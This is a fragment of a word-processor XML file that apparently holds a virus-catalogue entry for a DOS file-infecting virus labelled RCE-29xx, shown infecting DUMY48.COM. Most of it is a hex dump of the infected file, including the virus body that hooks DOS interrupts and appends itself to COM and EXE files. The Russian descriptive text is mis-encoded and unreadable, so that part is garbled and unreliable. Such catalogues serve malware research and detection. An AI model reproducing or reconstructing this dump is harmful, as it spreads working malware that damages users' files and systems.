      <w:r>
        <w:rPr/>
        <w:t>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 17.00 ������� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠥ��� �ᥣ�� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>(����� "��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>몠���</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>-2C" ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>ࠥ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⭮���� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>1/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� �����</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>뢠�� � ����� ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">ࠦ������ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䠩�� ����� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>F4h,  7Ah, 29h,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>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ࠣ���� ����� �஧�</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">䨫� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>DUMY48.COM, ��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 xml:space="preserve">ᮬ </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>RCE-29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: E9 2F 08 90 90 90 90 90  90 90 90 90 90 90 90 90   ./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: 90 90 03 00 90 90 90 90  90 90 90 90 90 90 90 9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: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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0: F4 7A 29 00 00 00 30 00  EE 0A 90 90 90 90 90 90   .z)...0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: 90 90 90 90 90 90 90 90  90 90 90 90 90 90 90 9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0: 90 90 90 90 90 90 90 90  90 90 39 03 98 14 60 14   ..........9...`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0: 64 02 56 05 9D 10 53 FF  00 F0 20 00 05 00 45 00   d.V...S... ..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 21 00 00 00 17 01 DC 00  72 D0 DF 04 55 5C 07 70   !.......r...U\.p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0: 00 89 BF CE 1B 97 5C 07  70 00 01 00 01 00 01 01   ......\.p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0: 00 00 10 00 00 01 00 02  B3 02 C7 11 C7 11 E6 0F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0: 28 0E C7 11 28 0E E6 0F  C4 17 C7 11 C7 11 E6 0F   (...(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B0: 28 0E C7 11 C7 11 C7 11  C7 11 E6 0F 28 0E 59 0D   (...........(.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0: 28 0E E6 0F C7 11 EF 12  C4 17 2C 15 EF 12 C7 11   (.........,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0: C7 11 2C 15 EF 12 2C 15  C5 1A 2C 15 EF 12 C7 11   ..,...,...,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0: 2C 15 C4 17 2C 15 C4 17  C5 1A 67 1C C5 1A C4 17   ,...,.....g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F0: 2C 15 EF 12 2C 15 C5 1A  2C 15 EF 12 C7 11 2C 15   ,...,...,.....,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: C4 17 C7 11 EF 12 E6 0F  C7 11 C7 11 FF FF 05 05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: 05 05 05 05 05 05 05 05  05 05 09 09 05 05 05 05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0: 05 05 05 05 05 05 05 05  09 09 05 05 05 05 05 05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0: 05 05 05 05 05 05 05 05  06 05 05 05 05 05 05 05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0: 06 05 05 05 05 09 09 FE  06 7A 7D FE 06 FB 7D 74   .........z}...}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0: 05 EA 00 7C 00 00 FC 33  C0 8E C0 BE 2A 7D BF 4C   ...|...3....*}.L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0: 00 A5 A5 26 83 06 13 04  02 EA 00 7C 00 00 56 1E   ...&amp;.......|.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0: 51 1E 07 8E 1E 60 00 C5  37 26 89 75 05 26 8C 5D   Q....`..7&amp;.u.&amp;.]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0: 07 80 3C CF 74 12 FC B9  05 00 F3 A4 C6 44 FB 9A   ..&lt;.t........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0: C7 44 FC AE 01 8C 4C FE  59 1F 5E C3 53 57 BB 04   .D....L.Y.^.SW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0: 00 BF 48 00 E8 C7 FF BB  0C 00 BF 51 00 E8 BE FF   ..H........Q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0: 5F 5B C3 51 57 C4 7C 05  26 80 3D 9A 75 0E 26 81   _[.QW.|.&amp;.=.u.&amp;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C0: 7D 01 AE 01 75 06 B9 05  00 FC F3 A4 5F 59 C3 56   }...u......._Y.V</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>01D0: BE 51 00 E8 DD FF BE 48  00 E8 D7 FF 5E C3 55 8B   .Q.....H....^.U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E0: EC 9C 06 1E 53 50 0E 1F  E8 E4 FF 8C C8 39 46 08   ....SP.......9F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0: 74 35 8E 5E 08 83 BF 02  00 29 75 20 81 BF 00 00   t5.^.....)u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: F4 7A 75 18 81 BF 08 00  EE 0A 75 10 8C D8 D1 EB   .zu.......u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0: D1 EB D1 EB D1 EB 03 C3  8E D8 EB 0B 83 6E 02 05   .............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0: 58 5B 1F 07 9D 5D CB E8  F8 00 8B 46 0A FE 06 5B   X[...].....F...[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0: 00 A9 00 01 75 07 FF 4E  06 FE 0E 5B 00 25 FF FE   ....u..N...[.%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0: 89 46 0A 0E 1F E8 54 FF  58 5B 1F 07 9D 5D 83 C4   .F....T.X[...]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0: 04 CF 55 8B EC 9C 50 53  1E 06 0E 1F E8 70 FF E8   ..U...PS.....p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0: 3A FF B8 40 00 8E C0 26  83 3E 6E 00 11 75 19 26   :..@...&amp;.&gt;n..u.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0: 83 3E 6C 00 00 75 11 C6  06 5A 00 00 C7 06 44 00   .&gt;l..u...Z...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0: DE 00 C7 06 46 00 6A 00  80 3E 5A 00 01 74 49 80   ....F.j..&gt;Z..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0: 3E 43 00 00 74 06 FE 0E  43 00 EB 3C 8B 1E 46 00   &gt;C..t...C..&lt;.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0: 83 3F FF 75 0D E4 61 24  FC E6 61 C6 06 5A 00 01   .?.u..a$..a..Z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B0: EB 26 B0 B6 E6 43 8B 07  E6 42 8A C4 E6 42 E4 61   .&amp;...C...B...B.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C0: 0C 03 E6 61 83 06 46 00  02 8B 1E 44 00 8A 07 FE   ...a..F....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D0: C8 A2 43 00 FF 06 44 00  07 1F 5B 58 9D 5D 2E FF   ..C...D...[X.]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0: 2E 36 00 2E FF 2E 2A 00  FF 2E 2A 00 55 8B EC FC   .6....*...*.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F0: FF 76 0A FF 76 08 FF 76  04 E8 F6 06 83 C4 06 FF   .v..v..v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0: 76 0C FF 76 06 FF 76 08  E8 AD 07 83 C4 06 FF 76   v..v..v........v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0: 0C FF 76 08 FF 76 06 FF  76 04 E8 C2 07 83 C4 08   ..v..v..v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0: 5D C3 50 53 51 52 56 57  06 9C FA B8 08 00 50 B8   ].PSQRVW......P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0: B1 00 50 B8 70 0B B1 04  D3 E8 8C DA 03 C2 50 B8   ..P.p.........P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0: F0 0A D3 E8 03 C2 50 B8  60 00 D3 E8 03 C2 50 E8   ......P.`.....P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0: 9A FF 83 C4 0A 9D 07 5F  5E 5A 59 5B 58 C3 9C FA   ......._^ZY[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0: 2E FF 1E 2E 00 C3 53 50  2E 8B 1E 3C 00 B4 45 E8   ......SP...&lt;.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70: EC FF 72 09 8B D8 B4 3E  E8 E3 FF EB 01 F8 58 5B   ..r....&gt;......X[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0380: C3 B0 03 CF B8 2A 00 2E  F6 06 5F 00 02 75 01 48   .....*...._..u.H</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0390: 3B D8 32 C0 D0 D0 50 B8  29 00 2E F6 06 5F 00 04   ;.2...P.)...._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A0: 75 01 40 3B D8 2E C4 1E  2E 00 58 44 44 FB CA 02   u.@;......XD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B0: 00 B8 29 00 EB 33 2E A0  5F 00 32 E4 EB 2B 2E 88   ..)..3.._.2..+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C0: 0E 5F 00 EB 24 90 9C 80  FC 4B 74 23 80 FC C5 74   ._..$....Kt#...t</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>03D0: 18 3D 00 C6 74 DB 3D 01  C6 74 DB 3D 02 C6 74 DE   .=..t.=..t.=.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E0: 3D 03 C6 74 9F 9D E9 50  03 9D FB F9 CA 02 00 50   =..t...P.......P</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>03F0: 32 C0 2E 86 06 5D 00 0A  C0 58 75 04 9D E9 39 03   2....]...Xu...9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0: 1E 0E 1F E8 1C FF C7 06  2E 03 90 90 E8 13 FF 1F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0: 06 1E 55 57 56 52 51 53  50 8B EC 0E 1F 80 3E 5B   ..UWVRQSP.....&gt;[</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0420: 00 00 74 03 E9 03 03 FF  76 0E FF 76 06 E8 29 03   ..t.....v..v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30: 9F 83 C4 04 9E 73 03 E9  F0 02 B8 00 42 33 C9 33   .....s......B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0: D2 8B 1E 3C 00 E8 16 FF  72 79 BA 0A 00 B4 3F B9   ...&lt;....ry....?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50: 14 00 E8 09 FF 72 6C 3D  14 00 75 67 A1 1C 00 F7   .....rl=..u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60: 26 62 00 8B CA 8B D0 B8  00 42 E8 F1 FE 72 78 BA   &amp;b.......B...rx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70: 00 00 B9 2A 00 B4 3F E8  E4 FE 72 6B 3D 2A 00 75   ...*..?...rk=*.u</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0480: 66 81 3E 00 00 F4 7A 75  5E B8 29 00 80 7E 00 00   f.&gt;...zu^.)..~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90: 75 07 F6 06 5F 00 02 74  01 40 39 06 02 00 73 23   u..._..t.@9...s#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>04A0: B8 00 42 33 C9 33 D2 E8  B4 FE 72 17 B4 40 BA 0A   ..B3.3....r..@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B0: 00 B9 20 00 E8 A7 FE 72  0A 3D 20 00 75 05 E8 A5   .. ....r.= .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0: FE 73 03 E9 58 02 B8 00  42 8B 0E 04 00 8B 16 06   .s..X...B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D0: 00 E8 8A FE 72 ED B4 40  33 C9 E8 81 FE 72 E4 E8   ....r..@3....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E0: 84 FE 72 DF E9 53 FF B8  02 42 B9 FF FF BA F8 FF   ..r..S...B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F0: 8B 1E 3C 00 E8 67 FE 72  1D BA 0A 00 B9 08 00 B4   ..&lt;..g.r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0: 3F E8 5A FE 72 10 3D 08  00 75 0B 81 3E 0E 00 F4   ?.Z.r.=..u..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10: 7A 74 06 EB 70 90 E9 05  02 80 3E 10 00 23 73 F6   zt..p.....&gt;..#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20: 8A 0E 11 00 A1 0A 00 A3  06 00 A1 0C 00 2D 03 01   .............-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30: A3 0B 00 80 3E 10 00 09  77 02 B1 E9 88 0E 0A 00   ....&gt;...w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0: B8 00 42 33 C9 8B D1 E8  14 FE 72 CA B4 40 BA 0A   ..B3......r..@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50: 00 B9 03 00 E8 07 FE 72  BD 3D 03 00 75 B8 E8 05   .......r.=..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60: FE 72 B3 B8 00 42 33 C9  8B 16 06 00 E8 EF FD 72   .r...B3........r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0570: A5 B4 40 33 C9 E8 E6 FD  72 08 E8 E9 FD 72 03 E9   ..@3....r....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80: 65 FF E9 99 01 C7 06 00  00 F4 7A C7 06 02 00 29   e.........z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0590: 00 C7 06 08 00 EE 0A 80  7E 00 00 75 E5 F6 06 5F   ........~..u..._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>05A0: 00 01 74 DE B8 02 42 33  C9 8B D1 8B 1E 3C 00 E8   ..t...B3.....&lt;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B0: AC FD 72 CE 89 16 04 00  A3 06 00 B8 00 42 33 C9   ..r..........B3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C0: 8B D1 E8 99 FD 72 BB BA  0A 00 B9 20 00 B4 3F E8   .....r..... ..?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D0: 8C FD 72 AE 3D 20 00 75  A9 81 3E 0A 00 4D 5A 74   ..r.= .u..&gt;..MZt</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>05E0: 0B 81 3E 0A 00 5A 4D 74  03 EB 63 90 C6 06 5C 00   ..&gt;..ZMt..c...\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F0: 00 83 3E 16 00 FF 75 8A  A1 0E 00 F7 26 66 00 2B   ..&gt;...u.....&amp;f.+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0: 06 06 00 1B 16 04 00 72  7D A1 18 00 F7 26 62 00   .......r}....&amp;b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10: 03 06 1A 00 8B CA 8B D8  A1 12 00 F7 26 62 00 8B   ............&amp;b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20: 3E 04 00 8B 36 06 00 83  C6 0F 83 D7 00 83 E6 F0   &gt;...6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30: 2B F0 1B FA 8B D1 8B C3  2B C6 1B D7 72 2B 81 C6   +.......+...r+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40: F0 0D 83 D7 00 2B DE 1B  CF 73 1E E9 D0 00 C6 06   .....+...s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50: 5C 00 01 83 3E 04 00 00  75 2C 83 3E 06 00 20 76   \...&gt;...u,.&gt;.. v</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0660: 25 81 3E 06 00 47 F2 73  1D B8 00 42 8B 0E 04 00   %.&gt;..G.s...B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70: 8B 16 06 00 83 C2 0F 83  D1 00 83 E2 F0 8B 1E 3C   ...............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680: 00 E8 DA FC 73 03 E9 95  00 33 D2 B9 70 0B B4 40   ....s....3..p..@</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0690: FF 36 5F 00 C6 06 5F 00  01 E8 C2 FC 59 88 0E 5F   .6_..._.....Y.._</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>06A0: 00 72 E3 3D 70 0B 75 DE  B9 04 00 B4 40 E8 AE FC   .r.=p.u.....@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B0: E8 B3 FC 72 D1 8B 16 04  00 A1 06 00 05 0F 00 25   ...r...........%</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>06C0: F0 FF F7 36 62 00 A3 1C  00 80 3E 5C 00 00 74 11   ...6b.....&gt;\.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D0: F7 26 62 00 C6 06 0A 00  E9 05 FF 07 A3 0B 00 EB   .&amp;b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E0: 26 A3 20 00 C7 06 1E 00  02 08 F7 26 62 00 05 70   &amp;. ........&amp;b..p</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>06F0: 0B 83 D2 00 F7 36 66 00  40 A3 0E 00 89 16 0C 00   .....6f.@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0: A1 12 00 29 06 20 00 B8  00 42 33 C9 8B D1 E8 4D   ...). ...B3....M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0: FC 72 0B BA 0A 00 B9 20  00 B4 40 E8 40 FC FF 76   .r..... ..@.@..v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0: 0E FF 76 06 E8 AC 00 83  C4 04 C6 06 5D 00 FF 58   ..v.........]..X</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0730: 5B 59 5A 5E 5F 5D 1F 07  9D 9C 0E 2E FF 36 68 00   [YZ^_].......6h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0: 2E 80 3E 5B 00 00 75 01  CF 55 8B EC 81 4E 06 00   ..&gt;[..u..U...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50: 01 2E C6 06 5B 00 00 5D  CF 55 8B EC 06 52 51 53   ....[..].U...RQS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0: 50 B8 00 33 E8 F7 FB 88  16 5E 00 B8 01 33 32 D2   P..3.....^...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0: E8 EB FB B8 24 35 E8 E5  FB 8C 06 34 00 89 1E 32   ....$5.....4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0780: 00 BA 51 03 B8 24 25 E8  D4 FB B8 00 43 1E C5 56   ..Q..$%.....C..V</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0790: 04 E8 CA FB 1F 72 6A 89  0E 3A 00 B8 01 43 1E 80   .....rj..:...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A0: E1 FE C5 56 04 E8 B6 FB  1F 72 56 B8 02 3D 1E C5   ...V.....rV..=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B0: 56 04 E8 A9 FB 1F 72 3A  A3 3C 00 8B D8 B8 00 57   V.....r:.&lt;.....W</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>07C0: E8 9B FB 89 0E 3E 00 89  16 40 00 58 5B 59 5A 07   .....&gt;...@.X[YZ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D0: 5D F8 C3 55 8B EC 06 52  51 53 50 8B 1E 3C 00 8B   ]..U...RQSP..&lt;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E0: 0E 3E 00 8B 16 40 00 B8  01 57 E8 71 FB B4 3E E8   .&gt;...@...W.q..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F0: 6C FB B8 01 43 1E 8B 0E  3A 00 C5 56 04 E8 5E FB   l...C...:..V..^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0: 1F B8 24 25 1E C5 16 32  00 E8 52 FB 1F 8A 16 5E   ..$%...2..R....^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0: 00 B8 01 33 E8 47 FB 58  5B 59 5A 07 5D F9 C3 59   ...3.G.X[YZ.]..Y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0: BA 00 02 2E 80 BF 5B 00  00 74 02 B6 03 52 0E 51   ......[..t...R.Q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0: 43 CF E8 00 00 5B 81 EB  05 08 2E C6 87 5D 00 FF   C....[.......]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0: FC 2E 80 BF 5C 00 00 74  18 BE 0A 00 03 F3 BF 00   ....\..t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0: 01 B9 20 00 F3 A4 0E 2E  FF B7 64 00 06 1E 50 EB   .. .......d...P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0: 13 8C DA 83 C2 10 2E 03  16 20 00 52 2E FF 36 1E   ......... .R.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70: 00 06 1E 50 53 BB 29 00  F8 B8 03 C6 CD 21 5B 73   ...PS.)......![s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0: 07 58 1F 07 E8 98 FF CB  2E 80 BF 5C 00 00 74 05   .X.........\.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0: 83 FC F0 72 EC 8C D8 48  8E C0 26 A1 03 00 2D BF   ...r...H..&amp;...-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A0: 00 3D 00 10 72 DB 26 A3  03 00 26 81 2E 12 00 BF   .=..r.&amp;...&amp;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B0: 00 26 8E 06 12 00 33 FF  8B F3 B9 70 0B F3 2E A4   .&amp;....3....p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C0: 06 1F 53 B8 21 35 CD 21  8C 06 2C 00 89 1E 2A 00   ..S.!5.!..,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D0: 8C 06 30 00 89 1E 2E 00  B8 01 35 CD 21 8B F3 8C   ..0.......5.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E0: C7 B8 1C 35 CD 21 8C 06  38 00 89 1E 36 00 5B B8   ...5.!..8...6.[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F0: 21 25 BA 96 03 CD 21 B8  01 25 BA F1 08 CD 21 BA   !%....!..%....!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0: 22 02 9C 8B C3 05 26 09  0E 50 FA 9C 58 0D 00 01   ".....&amp;..P..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0: 50 8B C3 05 B8 02 0E 50  B8 1C 25 C6 06 42 00 01   P......P..%..B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20: CF 55 8B EC 2E 80 3E 42  00 01 74 0D 81 66 06 FF   .U....&gt;B..t..f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30: FE 2E C6 06 42 00 00 5D  CF 81 7E 04 00 03 72 02   ....B..]..~...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40: 5D CF 53 8B 5E 02 2E 89  1E 2E 00 8B 5E 04 2E 89   ].S.^.......^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50: 1E 30 00 5B EB D6 C6 06  42 00 00 B8 01 25 8B D6   .0.[....B....%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60: 8E DF CD 21 33 C0 8E D8  C7 06 C5 00 7F 39 C6 06   ...!3........9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70: C7 00 29 A1 13 04 B1 06  D3 E0 8E D8 BE 2E 01 33   ..)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0980: C0 B9 61 00 03 04 83 C6  02 E2 F9 3D 3B 05 74 03   ..a........=;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90: E9 EE FE FA C6 06 7A 01  01 C6 06 FB 01 01 C6 06   ......z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A0: 93 00 E9 C7 06 94 00 41  03 1E 07 0E 1F 8B F3 81   .......A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B0: C6 17 01 BF D7 03 B9 27  00 F3 A4 FB E9 C2 FE 55   .......'.......U</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>09C0: 8B EC 51 B8 00 80 33 C9  85 46 08 75 05 41 D1 E8   ..Q...3..F.u.A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D0: EB F6 33 46 08 74 0F 8B  46 04 03 46 08 03 C1 2D   ..3F.t..F..F...-</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>09E0: 11 00 F8 59 5D C3 B8 0F  00 2B C1 03 46 06 F9 59   ...Y]....+..F..Y</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>09F0: 5D C3 55 8B EC 83 EC 10  BA 00 80 85 56 08 75 04   ].U.........V.u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00: D1 EA EB F7 06 57 50 16  07 8D 7E F0 B9 08 00 33   .....WP...~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0A10: C0 F3 AB 58 5F 07 8B 4E  08 85 CA 75 03 E9 89 00   ...X_..N...u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20: 51 FF 76 06 FF 76 04 E8  95 FF 8E C0 9F 83 C4 06   Q.v..v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30: 9E 72 3B 26 A1 00 00 31  46 F0 26 A1 02 00 31 46   .r;&amp;...1F.&amp;...1F</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0A40: F2 26 A1 04 00 31 46 F4  26 A1 06 00 31 46 F6 26   .&amp;...1F.&amp;...1F.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0A50: A1 08 00 31 46 F8 26 A1  0A 00 31 46 FA 26 A1 0C   ...1F.&amp;...1F.&amp;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60: 00 31 46 FC 26 A1 0E 00  31 46 FE EB 3C 90 8B 46   .1F.&amp;...1F..&lt;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0A70: F0 26 A3 00 00 8B 46 F2  26 A3 02 00 8B 46 F4 26   .&amp;....F.&amp;....F.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0A80: A3 04 00 8B 46 F6 26 A3  06 00 8B 46 F8 26 A3 08   ....F.&amp;....F.&amp;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90: 00 8B 46 FA 26 A3 0A 00  8B 46 FC 26 A3 0C 00 8B   ..F.&amp;....F.&amp;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A0: 46 FE 26 A3 0E 00 EB 05  90 49 E9 6C FF D1 EA 72   F.&amp;......I.l...r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0AB0: 03 E9 50 FF 8B E5 5D C3  55 8B EC 1E 8E 5E 04 8E   ..P...].U....^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C0: 46 06 33 DB 26 8B 07 31  07 83 C3 02 83 FB 10 72   F.3.&amp;..1.......r</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0AD0: F3 FF 46 04 FF 46 06 FF  4E 08 75 E0 1F 5D C3 55   ..F..F..N.u..].U</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0AE0: 8B EC 1E B3 01 33 F6 33  C9 8B 7E 08 03 7E 0A 4F   .....3.3..~..~.O</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0AF0: 8E DF D0 2C D1 D1 4F 3B  7E 08 73 F4 0B C9 74 11   ...,..O;~.s..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B00: 51 FF 76 06 FF 76 04 E8  B5 FE 83 C4 06 8E D8 30   Q.v..v.........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10: 1C 46 83 FE 10 72 D0 D0  E3 73 CA 1F 5D C3 87 DB   .F...r...s..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0: 35 6A F3 63 40 D0 6F 3B  54 55 DE 72 88 96 DD 78   5j.c@.o;TU.r...x</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B30: 6D 65 2D 0F 92 6F 13 92  E4 A5 C9 75 FD 40 A7 97   me-..o.....u.@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B40: D2 CC 0D B8 05 4A F2 D3  BC 0A 39 F6 78 20 55 18   .....J....9.x U.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="PreformattedText"/>
        <w:bidi w:val="0"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:jc w:val="left"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>0B50: A0 B6 59 E9 63 6D C2 14  B5 EB 1B 8A 1D C3 F6 3F   ..Y.cm......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>0B60: 41 9E BF 48 8A 06 A7 BA  0A 89 93 55 78 31 90 8F   A..H.......Ux1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B70: B0 BA A4 67 FD FB 36 9D  F8 25 85 98 28 EE BB 8E   ...g..6..%..(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B80: A4 27 6E 3D 35 E3 DC 9E  47 2D 3C 7C 5A E5 D4 07   .'n=5...G-&lt;|Z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B90: 80 5C 01 40 1F 4C BC FC  3D C3 E8 6D A1 4C 45 54   .\.@.L..=..m.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BA0:�F4 7A 29�00                                        .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5. ��</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>Ave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㯯� </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
